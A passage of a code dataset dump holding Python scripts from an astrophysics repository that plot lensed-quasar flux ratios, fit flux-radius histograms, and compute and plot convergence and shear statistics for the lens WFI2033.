"9feb411606f4eb465fa6d2612068e1fcedfad0c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7836, "license_type": "no_license", "max_line_length": 130, "num_lines": 128, "path": "/python/plot_utilities/plot_fluxratio.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Simple code for scatter plot without error bars. Computes bias, scatter and fraction of outliers\n##########################\n\n#from matplotlib.colors import LogNorm\n#import scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\nplt.clf()\n\n#A_125_1 = 1.476526e+06\n#B_125_1 = 2.233584e+05\n#C_125_1 = 1.344782e+05\n#D_125_1 = 7.739332e+04\n#A_125_2 = 1.436465e+06\n#B_125_2 = 2.133077e+05\n#C_125_2 = 1.474414e+05\n#D_125_2 = 6.260539e+04\n#A_160_1 = 3.499114e+06\n#B_160_1 = 3.805276e+05\n#C_160_1 = 2.701676e+05\n#D_160_1 = 1.401271e+05\n#A_160_2 = 3.157662e+06\n#B_160_2 = 3.534201e+05\n#C_160_2 = 2.970849e+05\n#D_160_2 = 1.389452e+05\n\nA_125_1 = 10 ** ((-18.18 + 26.23)/2.5)\nB_125_1 = 10 ** ((-20.28 + 26.23)/2.5)\nC_125_1 = 10 ** ((-20.86 + 26.23)/2.5)\nD_125_1 = 10 ** ((-21.45 + 26.23)/2.5)\nA_125_2 = 10 ** ((-18.26 + 26.23)/2.5)\nB_125_2 = 10 ** ((-20.31 + 26.23)/2.5)\nC_125_2 = 10 ** ((-20.69 + 26.23)/2.5)\nD_125_2 = 10 ** ((-21.74 + 26.23)/2.5)\nA_160_1 = 10 ** ((-17.53 + 25.95)/2.5)\nB_160_1 = 10 ** ((-20.05 + 25.95)/2.5)\nC_160_1 = 10 ** ((-20.44 + 25.95)/2.5)\nD_160_1 = 10 ** ((-21.09 + 25.95)/2.5)\nA_160_2 = 10 ** ((-17.75 + 25.95)/2.5)\nB_160_2 = 10 ** ((-20.09 + 25.95)/2.5)\nC_160_2 = 10 ** ((-20.26 + 25.95)/2.5)\nD_160_2 = 10 ** ((-21.11 + 25.95)/2.5)\n\nmuAnopert,muBnopert,muCnopert,muDnopert = np.loadtxt(\"pointSIEgamma_einstmagniftime_out_mcmc.dat\",usecols=[14,10,6,2],unpack=True)\nmuApert,muBpert,muCpert,muDpert = np.loadtxt(\"point1pertSIEgamma_einstmagniftime_out_mcmc.dat\",usecols=[14,10,6,2],unpack=True)\n\nplt.hist(np.abs(muCnopert/muAnopert),bins=100,normed=True,label='predicted C/A w/o GX',color='r',histtype='stepfilled')\nplt.hist(np.abs(muCnopert/muBnopert),bins=100,normed=True,label='predicted C/B w/o GX',color='b',histtype='stepfilled')\nplt.hist(np.abs(muCnopert/muDnopert),bins=100,normed=True,label='predicted C/D w/o GX',color='g',histtype='stepfilled')\nplt.hist(np.abs(muCpert/muApert),bins=100,normed=True,label='predicted C/A w/ GX',color='r',histtype='step')\nplt.hist(np.abs(muCpert/muBpert),bins=100,normed=True,label='predicted C/B w/ GX',color='b',histtype='step')\nplt.hist(np.abs(muCpert/muDpert),bins=100,normed=True,label='predicted C/D w/ GX',color='g',histtype='step')\n\nplt.axvline(C_125_1/A_125_1, 0, 1, linestyle='--', linewidth=3, color='r', label='F125 C/A visit 1')\nplt.axvline(C_125_1/B_125_1, 0, 1, linestyle='--', linewidth=3, color='b', label='F125 C/B visit 1')\nplt.axvline(C_125_1/D_125_1, 0, 1, linestyle='--', linewidth=3, color='g', label='F125 C/D visit 1')\nplt.axvline(C_160_1/A_160_1, 0, 1, linestyle='--', linewidth=1, color='r', label='F160 C/A visit 1')\nplt.axvline(C_160_1/B_160_1, 0, 1, linestyle='--', linewidth=1, color='b', label='F160 C/B visit 1')\nplt.axvline(C_160_1/D_160_1, 0, 1, linestyle='--', linewidth=1, color='g', label='F160 C/D visit 1')\nplt.axvline(C_125_2/A_125_2, 0, 1, linestyle='-', linewidth=3, color='r', label='F125 C/A visit 2')\nplt.axvline(C_125_2/B_125_2, 0, 1, linestyle='-', linewidth=3, color='b', label='F125 C/B visit 2')\nplt.axvline(C_125_2/D_125_2, 0, 1, linestyle='-', linewidth=3, color='g', label='F125 C/D visit 2')\nplt.axvline(C_160_2/A_160_2, 0, 1, linestyle='-', linewidth=1, color='r', label='F160 C/A visit 2')\nplt.axvline(C_160_2/B_160_2, 0, 1, linestyle='-', linewidth=1, color='b', label='F160 C/B visit 2')\nplt.axvline(C_160_2/D_160_2, 0, 1, linestyle='-', linewidth=1, color='g', label='F160 C/D visit 2')\n\nplt.legend(prop={'size': 8}) # font size\nplt.tick_params(labelsize=14)\nplt.xlabel('Flux ratio', fontsize=16)\nplt.ylabel('Normalized distribution', fontsize=16)\nplt.savefig('fluxratiosC.png')\n\nplt.clf()\n\nplt.hist(np.abs(muBnopert/muAnopert),bins=100,normed=True,label='predicted B/A w/o GX',color='r',histtype='stepfilled')\nplt.hist(np.abs(muBnopert/muCnopert),bins=100,normed=True,label='predicted B/C w/o GX',color='b',histtype='stepfilled')\nplt.hist(np.abs(muBnopert/muDnopert),bins=100,normed=True,label='predicted B/D w/o GX',color='g',histtype='stepfilled')\nplt.hist(np.abs(muBpert/muApert),bins=100,normed=True,label='predicted B/A w/ GX',color='r',histtype='step')\nplt.hist(np.abs(muBpert/muCpert),bins=100,normed=True,label='predicted B/C w/ GX',color='b',histtype='step')\nplt.hist(np.abs(muBpert/muDpert),bins=100,normed=True,label='predicted B/D w/ GX',color='g',histtype='step')\n\nplt.axvline(B_125_1/A_125_1, 0, 1, linestyle='--', linewidth=3, color='r', label='F125 B/A visit 1')\nplt.axvline(B_125_1/C_125_1, 0, 1, linestyle='--', linewidth=3, color='b', label='F125 B/C visit 1')\nplt.axvline(B_125_1/D_125_1, 0, 1, linestyle='--', linewidth=3, color='g', label='F125 B/D visit 1')\nplt.axvline(B_160_1/A_160_1, 0, 1, linestyle='--', linewidth=1, color='r', label='F160 B/A visit 1')\nplt.axvline(B_160_1/C_160_1, 0, 1, linestyle='--', linewidth=1, color='b', label='F160 B/C visit 1')\nplt.axvline(B_160_1/D_160_1, 0, 1, linestyle='--', linewidth=1, color='g', label='F160 B/D visit 1')\nplt.axvline(B_125_2/A_125_2, 0, 1, linestyle='-', linewidth=3, color='r', label='F125 B/A visit 2')\nplt.axvline(B_125_2/C_125_2, 0, 1, linestyle='-', linewidth=3, color='b', label='F125 B/C visit 2')\nplt.axvline(B_125_2/D_125_2, 0, 1, linestyle='-', linewidth=3, color='g', label='F125 B/D visit 2')\nplt.axvline(B_160_2/A_160_2, 0, 1, linestyle='-', linewidth=1, color='r', label='F160 B/A visit 2')\nplt.axvline(B_160_2/C_160_2, 0, 1, linestyle='-', linewidth=1, color='b', label='F160 B/C visit 2')\nplt.axvline(B_160_2/D_160_2, 0, 1, linestyle='-', linewidth=1, color='g', label='F160 B/D visit 2')\n\nplt.legend(prop={'size': 8}) # font size\nplt.tick_params(labelsize=14)\nplt.xlabel('Flux ratio', fontsize=16)\nplt.ylabel('Normalized distribution', fontsize=16)\nplt.savefig('fluxratiosB.png')\n\nplt.clf()\n\nplt.hist(np.abs(muDnopert/muAnopert),bins=100,normed=True,label='predicted D/A w/o GX',color='r',histtype='stepfilled')\nplt.hist(np.abs(muDnopert/muBnopert),bins=100,normed=True,label='predicted D/B w/o GX',color='b',histtype='stepfilled')\nplt.hist(np.abs(muDnopert/muCnopert),bins=100,normed=True,label='predicted D/D w/o GX',color='g',histtype='stepfilled')\nplt.hist(np.abs(muDpert/muApert),bins=100,normed=True,label='predicted D/A w/ GX',color='r',histtype='step')\nplt.hist(np.abs(muDpert/muBpert),bins=100,normed=True,label='predicted D/B w/ GX',color='b',histtype='step')\nplt.hist(np.abs(muDpert/muCpert),bins=100,normed=True,label='predicted D/D w/ GX',color='g',histtype='step')\n\nplt.axvline(D_125_1/A_125_1, 0, 1, linestyle='--', linewidth=3, color='r', label='F125 D/A visit 1')\nplt.axvline(D_125_1/B_125_1, 0, 1, linestyle='--', linewidth=3, color='b', label='F125 D/B visit 1')\nplt.axvline(D_125_1/C_125_1, 0, 1, linestyle='--', linewidth=3, color='g', label='F125 D/C visit 1')\nplt.axvline(D_160_1/A_160_1, 0, 1, linestyle='--', linewidth=1, color='r', label='F160 D/A visit 1')\nplt.axvline(D_160_1/B_160_1, 0, 1, linestyle='--', linewidth=1, color='b', label='F160 D/B visit 1')\nplt.axvline(D_160_1/C_160_1, 0, 1, linestyle='--', linewidth=1, color='g', label='F160 D/C visit 1')\nplt.axvline(D_125_2/A_125_2, 0, 1, linestyle='-', linewidth=3, color='r', label='F125 D/A visit 2')\nplt.axvline(D_125_2/B_125_2, 0, 1, linestyle='-', linewidth=3, color='b', label='F125 D/B visit 2')\nplt.axvline(D_125_2/C_125_2, 0, 1, linestyle='-', linewidth=3, color='g', label='F125 D/C visit 2')\nplt.axvline(D_160_2/A_160_2, 0, 1, linestyle='-', linewidth=1, color='r', label='F160 D/A visit 2')\nplt.axvline(D_160_2/B_160_2, 0, 1, linestyle='-', linewidth=1, color='b', label='F160 D/B visit 2')\nplt.axvline(D_160_2/C_160_2, 0, 1, linestyle='-', linewidth=1, color='g', label='F160 D/C visit 2')\n\nplt.legend(prop={'size': 8}) # font size\nplt.tick_params(labelsize=14)\nplt.xlabel('Flux ratio', fontsize=16)\nplt.ylabel('Normalized distribution', fontsize=16)\nplt.savefig('fluxratiosD.png')\n\n\n" }, { "alpha_fraction": 0.6462311744689941, "alphanum_fraction": 0.6864321827888489, "avg_line_length": 44.227272033691406, "blob_id": "422b6247cc00c1b88021502c4aad62c5f76cc695", "content_id": "d98b76a1f306af40ef0b7f50b562f7bd55ba7d82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 168, "num_lines": 22, "path": "/python/catalogue_utilities/limfluxrad.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code computes the histogram of Sextractor fluxradius parameter and fits it with a Gaussian. THis is useful for the star-galaxy classification employed by CFHTLenS\n\nimport numpy as np\nimport pylab as plt\nfrom scipy.optimize import leastsq\nplt.clf()\nmag,rad=np.loadtxt(\"i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazy.cat\",usecols=(4,6),unpack=True)\nrad = rad[(mag<21) & (rad<6)]\nfitfunc = lambda p, x: p[0]*np.exp(-0.5*((x-p[1])/p[2])**2)\nerrfunc = lambda p, x, y: (y - fitfunc(p, x))\ninit = [20.0, 2.5, 1]\nbins = 50\nydata,xdatabin = np.histogram(rad,bins)\nbin = xdatabin[1]-xdatabin[0]\nxdata = np.linspace(xdatabin[0]+bin/2.0,xdatabin[len(xdatabin)-1]-bin/2.0,len(xdatabin)-1)\nout = leastsq( errfunc, init, args=(xdata, ydata))\nc = out[0]\nc[2] = np.abs(c[2]) # because by definition, c[2] may be negative\nplt.plot(xdata, fitfunc(c, xdata))\nplt.hist(rad, bins)\nplt.title(r'$A = %.3f\\ \\mu = %.3f\\ \\sigma = %.3f\\ $' %(c[0],c[1],c[2]));\nplt.show()\n" }, { "alpha_fraction": 0.6599099040031433, "alphanum_fraction": 0.6869369149208069, "avg_line_length": 30.714284896850586, "blob_id": "c07d5e9bfa99383fb68b570d2d8e053b28a04318", "content_id": "0545d74084de4027003a9cd4c593e513c2e6409f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 444, "license_type": "no_license", "max_line_length": 133, "num_lines": 14, "path": "/python/modeling_utilities/optimize.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# minimize a function computed by another code\n\nimport subprocess\nimport numpy as np\nfrom scipy.optimize import minimize\n\ndef func(x):\n s = subprocess.check_output([\"python\", \"/Users/cerusu/GITHUB/zMstarPDF/python/modeling_utilities/func.py\", str(x[0]), str(x[1])])\n print str(x[0]), str(x[1])\n return float(s)\n\nx0 = np.array([0.1,0.1])\nres = minimize(func, x0, method='nelder-mead', options={'xtol': 1e-8, 'disp': True})\nprint(res.x)\n" }, { "alpha_fraction": 0.5588458776473999, "alphanum_fraction": 0.6613515615463257, "avg_line_length": 53.875, "blob_id": "6bb200f1e80fd10b4998a0b043ef73e061f8bea5", "content_id": "22161a59b1854ea732d98e75aee376de9b6d4eb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1317, "license_type": "no_license", "max_line_length": 122, "num_lines": 24, "path": "/python/catalogue_utilities/inferkappasimbiasscript2.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# script the execution of inferkappasimbias.py to vary with a specific parameter\n\nimport sys\nimport os\n#import numpy as np\n\nfile = \"/lfs08/rusucs/code/inferkappasimbias.py\"\nfor i in range(20): # 8\n constr_gal_meds45 = 0.6 + i * 0.2\n with open(file, 'r') as f:\n code = f.readlines()\n code[138 - 1] = \"constr_gal_meds45 = %s \\n\" % constr_gal_meds45\n code[139 - 1] = \"constrwidth_gal_meds_inf45 = %s \\n\" % (constr_gal_meds45 - 0.05)\n code[140 - 1] = \"constrwidth_gal_meds_sup45 = %s \\n\" % (constr_gal_meds45 + 0.05)\n code[142 - 1] = \"constr_gal_meds120 = %s \\n\" % constr_gal_meds45\n code[143 - 1] = \"constrwidth_gal_meds_inf120 = %s \\n\" % (constr_gal_meds45 - 0.05)\n code[144 - 1] = \"constrwidth_gal_meds_sup120 = %s \\n\" % (constr_gal_meds45 + 0.05)\n with open(file, 'w') as f:\n f.writelines(code)\n f.close()\n #os.system(\"python inferkappasimbias.py WFI2033 -1.0 -1.0 empty notremovegroups 5 22.5 measured med 45_gal\")\n os.system(\"python inferkappasimbias.py WFI2033 -1.0 -1.0 empty notremovegroups 5 22.5 measured med 120_gal 120_gamma\")\n #os.system(\"python inferkappasimbias.py WFI2033 -1.0 -1.0 empty notremovegroups 5 23.5 measured med 45_gal\")\n #os.system(\"python inferkappasimbias.py WFI2033 -1.0 -1.0 empty notremovegroups 5 23.5 measured med 120_gal\")\n" }, { "alpha_fraction": 0.7411764860153198, "alphanum_fraction": 0.774117648601532, "avg_line_length": 27.33333396911621, "blob_id": "be407c2b7258438ddb1d0a2cf93343c75ffd7b08", "content_id": "00b0c9a9eccd6a27225e599018a77fa1ac07508e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 425, "license_type": "no_license", "max_line_length": 88, "num_lines": 15, "path": "/python/image_utilities/headers.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Header manupulation\n\nfrom astropy.io import fits\n\nimage0 = fits.open('VISTAmatch_Ks_small.fits')\ndata0 = image0[0].data\nhead0 = image0[0].header\n\nimage1 = fits.open('lensfixcompanion_correctPSFshowlens_subtractK.fits')\n\n#h['NITER'] = (niter, 'number of Richardson Lucy iterations')\n\nimage1_corr = image1\nimage1_corr[0].header = head0\nimage1_corr.writeto('lensfixcompanion_correctPSFshowlens_subtractK.fits',overwrite=True)\n" }, { "alpha_fraction": 0.5649819374084473, "alphanum_fraction": 0.612364649772644, "avg_line_length": 30.657142639160156, "blob_id": "662996f3f16604c6c8a09892c1548f60344fe925", "content_id": "ee1c7c3bb6b19fe9f96a9999b2b1912a16631ee3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2216, "license_type": "no_license", "max_line_length": 156, "num_lines": 70, "path": "/python/catalogue_utilities/kappagammaforChihFan.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, July 8 2018\n# run as e.g.: python /lfs08/rusucs/code/kappamed_insertstarsnobeta.py GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f\n\nimport numpy as np\nimport scipy\nimport sys\nimport os\nfrom os import system\nfrom scipy import special\nimport time\n\ndef pause():\n programPause = raw_input(\"Press the <ENTER> key to continue...\") # use for debugging\n\ndef readbinary(replacestr):\n replace = plane + replacestr\n os.system(\"sed \\\"11s/.*/ const char kappa_file_name[] = \\\\\\\"\\%s\\\\\\\";/\\\" readKappaBinary.c > readKappaBinary_%s.c_\" % (replace,plane))\n os.system(\"sed \\\"35s/.*/ fpt = fopen (\\\\\\\"kappa_values_%s.dat\\\\\\\", \\\\\\\"w\\\\\\\");/\\\" readKappaBinary_%s.c_ > readKappaBinary_%s.c\" % (plane,plane,plane))\n os.system(\"rm -f readKappaBinary_%s.c_\" % plane)\n os.system(\"gcc readKappaBinary_%s.c -o compiled_%s.out\" % (plane,plane))\n os.system(\"./compiled_%s.out\" % plane)\n os.system(\"rm -f readKappaBinary_%s.c\" % plane)\n os.system(\"rm -f compiled_%s.out\" % plane)\n\nstart_time = time.time()\n\nplane = str(sys.argv[1])\n\n#if lens == \"B1608\":\n# z_s = 1.39\n# pln = 37 # MS simulation plane\n#if lens == \"HE0435\":\n# z_s = 1.69\n# z_l = 0.455\n#if lens == \"WFI2033\":\n# z_s = 1.66\n# z_l = 0.66\n#if lens == \"HE1104\":\n# z_s = 2.32\n#pln = 30 & 31\n#if lens == \"RX1131\":\n# z_s = 0.66\n##pln = 45 & 46\n#if lens == \"J1206\":\n# z_s = 1.79\n# pln = 34\n#if lens == \"PG1115\":\n# z_s = 1.72\npln = 34\n\nrootkappaplanes = \"/lfs08/rusucs/kappaplanes/\"\n\nstart_readkappa = time.time()\n\nif str(pln) in plane:\n os.chdir(rootkappaplanes)\n readbinary(\".kappa\")\n kappa = np.loadtxt(\"kappa_values_%s.dat\" % plane, usecols = [1], unpack=True)\n readbinary(\".gamma_1\")\n gamma1 = np.loadtxt(\"kappa_values_%s.dat\" % plane, usecols = [1], unpack=True)\n readbinary(\".gamma_2\")\n gamma2 = np.loadtxt(\"kappa_values_%s.dat\" % plane, usecols = [1], unpack=True)\n kappagamma = np.c_[kappa,np.sqrt(gamma1 ** 2 + gamma2 ** 2)]\n os.system(\"rm -f kappa_values_%s.dat\" % plane)\n np.savetxt(\"kappagamma_values_%s.dat\" % plane,kappagamma,fmt=\"%e %e\")\nelse: sys.exit('Wrong MS plane for this lens!!!')\n\nprint(\" Field done in --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.6293706297874451, "alphanum_fraction": 0.7086247205734253, "avg_line_length": 21.578947067260742, "blob_id": "19b4c16081e84e59a2b66a8f7ceb455a9569b363", "content_id": "dc8b41a9ae6a0ced6c4a0f0b650dbd8abb8d5226", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 429, "license_type": "no_license", "max_line_length": 44, "num_lines": 19, "path": "/python/plot_utilities/nierenberg2019chi.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Testing Figure 4 in Nierenberg et al. 2019\n\n#import matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n#import scipy as sp\n#from scipy.stats import norm\nimport numpy as np\n\nplt.clf()\nx = np.random.normal(0, 1, 1000)\nchi2 = ((0-x)**2)/(1**2)\nargchi2sort = np.argsort(chi2)\nf = (argchi2sort + 1)/1000.0\nchi2sort = chi2[argchi2sort]\nplt.xscale('log')\nplt.xlim([0.01,10])\nplt.scatter(chi2sort,np.sort(f))\nplt.show()\n" }, { "alpha_fraction": 0.6238394975662231, "alphanum_fraction": 0.7202755212783813, "avg_line_length": 55.59321975708008, "blob_id": "d9373c3c2d42c62791bfc8a50657674bf96600a8", "content_id": "b22b8a5847c4d88e2ac099241855cae36f29d1f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3339, "license_type": "no_license", "max_line_length": 262, "num_lines": 59, "path": "/python/plot_utilities/densityplot.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# produces density plot\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\nimport corner\n\nfont = 10\nticksize = 10\n\nimport sys\nfile = str(sys.argv[1])\nplt.clf()\nfig = plt.figure(figsize=(10,12))\n#fig, axes = plt.subplots(nrows=2, ncols=2)\n\nfile1 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_22.5_med_increments4_1000_4_emptymsk_shearwithoutprior_test_kappagamma.cat\"\nfile2 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_22.5_med_increments4_1000_4_emptymsk_shearwithoutprior_test_kappagamma_fiducialzeta.cat\"\nfile3 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments4_1000_4_4_4_emptymsk_shearwithoutprior_test_kappagamma.cat\"\nfile4 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_120_gal_120_gamma_120_oneoverr_45_gal_45_oneoverr_22.5_med_increments4_1000_4_4_4_emptymsk_shearwithoutprior_test_kappagamma_fiducialzeta.cat\"\nfile5 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_gamma_45_oneoverr_22.5_med_increments4_1000_4_emptymsk_shearwithoutprior_test_kappagamma.cat\"\nfile6 = \"../WFI2033/MSkapparesults/kappahist_WFI2033_measured_5innermask_nobeta_removehandpicked_zgap-1.0_-1.0_fiducial_45_gal_45_gamma_45_oneoverr_22.5_med_increments4_1000_4_emptymsk_shearwithoutprior_test_kappagamma_fiducialzeta.cat\"\nax1 = fig.add_subplot(1,1,1)\nax1.set_aspect(1)\nif file == \"1\": x, y = np.loadtxt(file1, usecols=(0, 1), unpack=True)\nif file == \"2\": x, y = np.loadtxt(file2, usecols=(0, 1), unpack=True)\nif file == \"3\": x, y = np.loadtxt(file3, usecols=(0, 1), unpack=True)\nif file == \"4\": x, y = np.loadtxt(file4, usecols=(0, 1), unpack=True)\nif file == \"5\": x, y = np.loadtxt(file5, usecols=(0, 1), unpack=True)\nif file == \"6\": x, y = np.loadtxt(file6, usecols=(0, 1), unpack=True)\nxlim = 0.10\nxlim_ = -0.05\nylim = 0.05\nylim_ = 0.03\nx_ = x[(x >= xlim_) & (x <= xlim) & (y >= ylim_) & (y <= ylim)]\ny_ = y[(x >= xlim_) & (x <= xlim) & (y >= ylim_) & (y <= ylim)]\nx = x_\ny = y_\n#hist2d(x, y, bins=[100, 100], norm=LogNorm())\n#plt.xticks(rotation='vertical',size = ticksize)\n#plt.yticks(size = ticksize)\n#colorbar()\n\nfigure = corner.corner(np.c_[x,y], labels=[\"$\\kappa$\",\"$\\gamma$\"],quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\n\n#plt.xlabel('$\\kappa$', fontsize=font)\n#plt.ylabel('$\\gamma$', fontsize=font)\n#plt.xlim(xlim_, xlim)\n#plt.ylim(ylim_, ylim)\nif file == \"1\": figure.savefig('../WFI2033/MSkapparesults/1.png' , dpi=250)\nif file == \"2\": figure.savefig('../WFI2033/MSkapparesults/2.png' , dpi=250)\nif file == \"3\": figure.savefig('../WFI2033/MSkapparesults/3.png' , dpi=250)\nif file == \"4\": figure.savefig('../WFI2033/MSkapparesults/4.png' , dpi=250)\nif file == \"5\": figure.savefig('../WFI2033/MSkapparesults/5.png' , dpi=250)\nif file == \"6\": figure.savefig('../WFI2033/MSkapparesults/6.png' , dpi=250)\n" }, { "alpha_fraction": 0.44161707162857056, "alphanum_fraction": 0.505027711391449, "avg_line_length": 49.76041793823242, "blob_id": "e18a9571ee6f462f66e43b690d78e8113d593e8f", "content_id": "81f1026f282c3aeb1629268ef07b8b9207edd125", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4873, "license_type": "no_license", "max_line_length": 377, "num_lines": 96, "path": "/python/catalogue_utilities/plotkappabar.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure the uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\ndata = np.genfromtxt('%smedstd.dat' % root,dtype=['S1000','f8','f8','f8','f8'])\n\nkappastat = np.array([])\nfor i in range(np.shape(data)[0]):\n if i == 0:\n kappastat = np.array([data[i][1],data[i][2],data[i][3],data[i][4]])\n else:\n x = np.array([data[i][1],data[i][2],data[i][3],data[i][4]])\n kappastat = np.c_[kappastat,x]\n\nkappastat_120 = np.c_[kappastat[:,22-1], # 1-1/r\n kappastat[:,17-1], # z\n kappastat[:,14-1], # M_\\star\n kappastat[:,6-1], # M^2_\\star\n kappastat[:,10-1], # M^3_\\star$\n kappastat[:,19-1], # 1/r\n kappastat[:,18-1], # z/r\n kappastat[:,15-1], # M_\\star/r\n kappastat[:,7-1], # M^2_\\star/r\n kappastat[:,11-1], # M^3_\\star/r\n kappastat[:,9-1], # M^2_{\\star\\mathrm{rms}}\n kappastat[:,13-1], # M^3_{\\star\\mathrm{rms}}\n kappastat[:,8-1], # M^2_\\star/r_\\mathrm{,rms}\n kappastat[:,12-1], # M^3_\\star/r_\\mathrm{,rms}\n kappastat[:,5-1], # flexion\n kappastat[:,16-1], # tidal\n kappastat[:,3-1], # SIS\n kappastat[:,4-1]] # SIShalo\nkappastat_45 = np.c_[kappastat[:,25-1], # 1-1/r\n kappastat[:,47-1], # z\n kappastat[:,44-1], # M_\\star\n kappastat[:,36-1], # M^2_\\star\n kappastat[:,40-1], # M^3_\\star$\n kappastat[:,33-1], # 1/r\n kappastat[:,48-1], # z/r\n kappastat[:,45-1], # M_\\star/r\n kappastat[:,37-1], # M^2_\\star/r\n kappastat[:,41-1], # M^3_\\star/r\n kappastat[:,39-1], # M^2_{\\star\\mathrm{rms}}\n kappastat[:,43-1], # M^3_{\\star\\mathrm{rms}}\n kappastat[:,38-1], # M^2_\\star/r_\\mathrm{,rms}\n kappastat[:,42-1], # M^3_\\star/r_\\mathrm{,rms}\n kappastat[:,35-1], # flexion\n kappastat[:,46-1], # tidal\n kappastat[:,34-1], # SIS\n kappastat[:,34-1]] # SIShalo\n\nN = 18\nind = 2.5 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat_45[0])\nrects1 = ax.bar(ind + width, col1, width, color='r')\ncol2 = (kappastat_120[0])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.05,0.05])\nax.set_ylabel('median$_\\kappa$')\n#ax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\n\nax = plt.subplot(2,1,2)\n\ncol3 = (kappastat_45[1])\nrects3 = ax.bar(ind + width, col3, width, color='r')\ncol4 = (kappastat_120[1])\nrects4 = ax.bar(ind + 2*width, col4, width, color='b')\n\nax.set_ylim([0,0.05])\nax.set_ylabel('$\\sigma_\\kappa$')\n#ax.set_ylabel('$\\sigma_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', '$M^3_\\star/r_\\mathrm{,rms}$', '$M_\\star/r^3$', '$M_\\star/r^2$', '$\\sqrt{M_\\star}/r$', '$\\sqrt{M_h}/r$'), fontsize=10, rotation='vertical')\nax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+', '120 22.5 gal+1/r+'), bbox_to_anchor=(0.65, 1.4), fontsize=10)\n#ax.legend((rects1[0], rects2[0]), ('45 22.5 gal+1/r+$\\gamma$+', '120 22.5 gal+1/r+$\\gamma$+'), bbox_to_anchor=(0.3, 0.97), fontsize=10)\nplt.subplots_adjust(left=0.15, bottom=0.15, right=0.95, top=0.95, wspace=0.7, hspace=0.7)\nplt.savefig('%skappashistbar-separately45and120noshear.png' % root, dpi=250)\n\nplt.clf()\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": 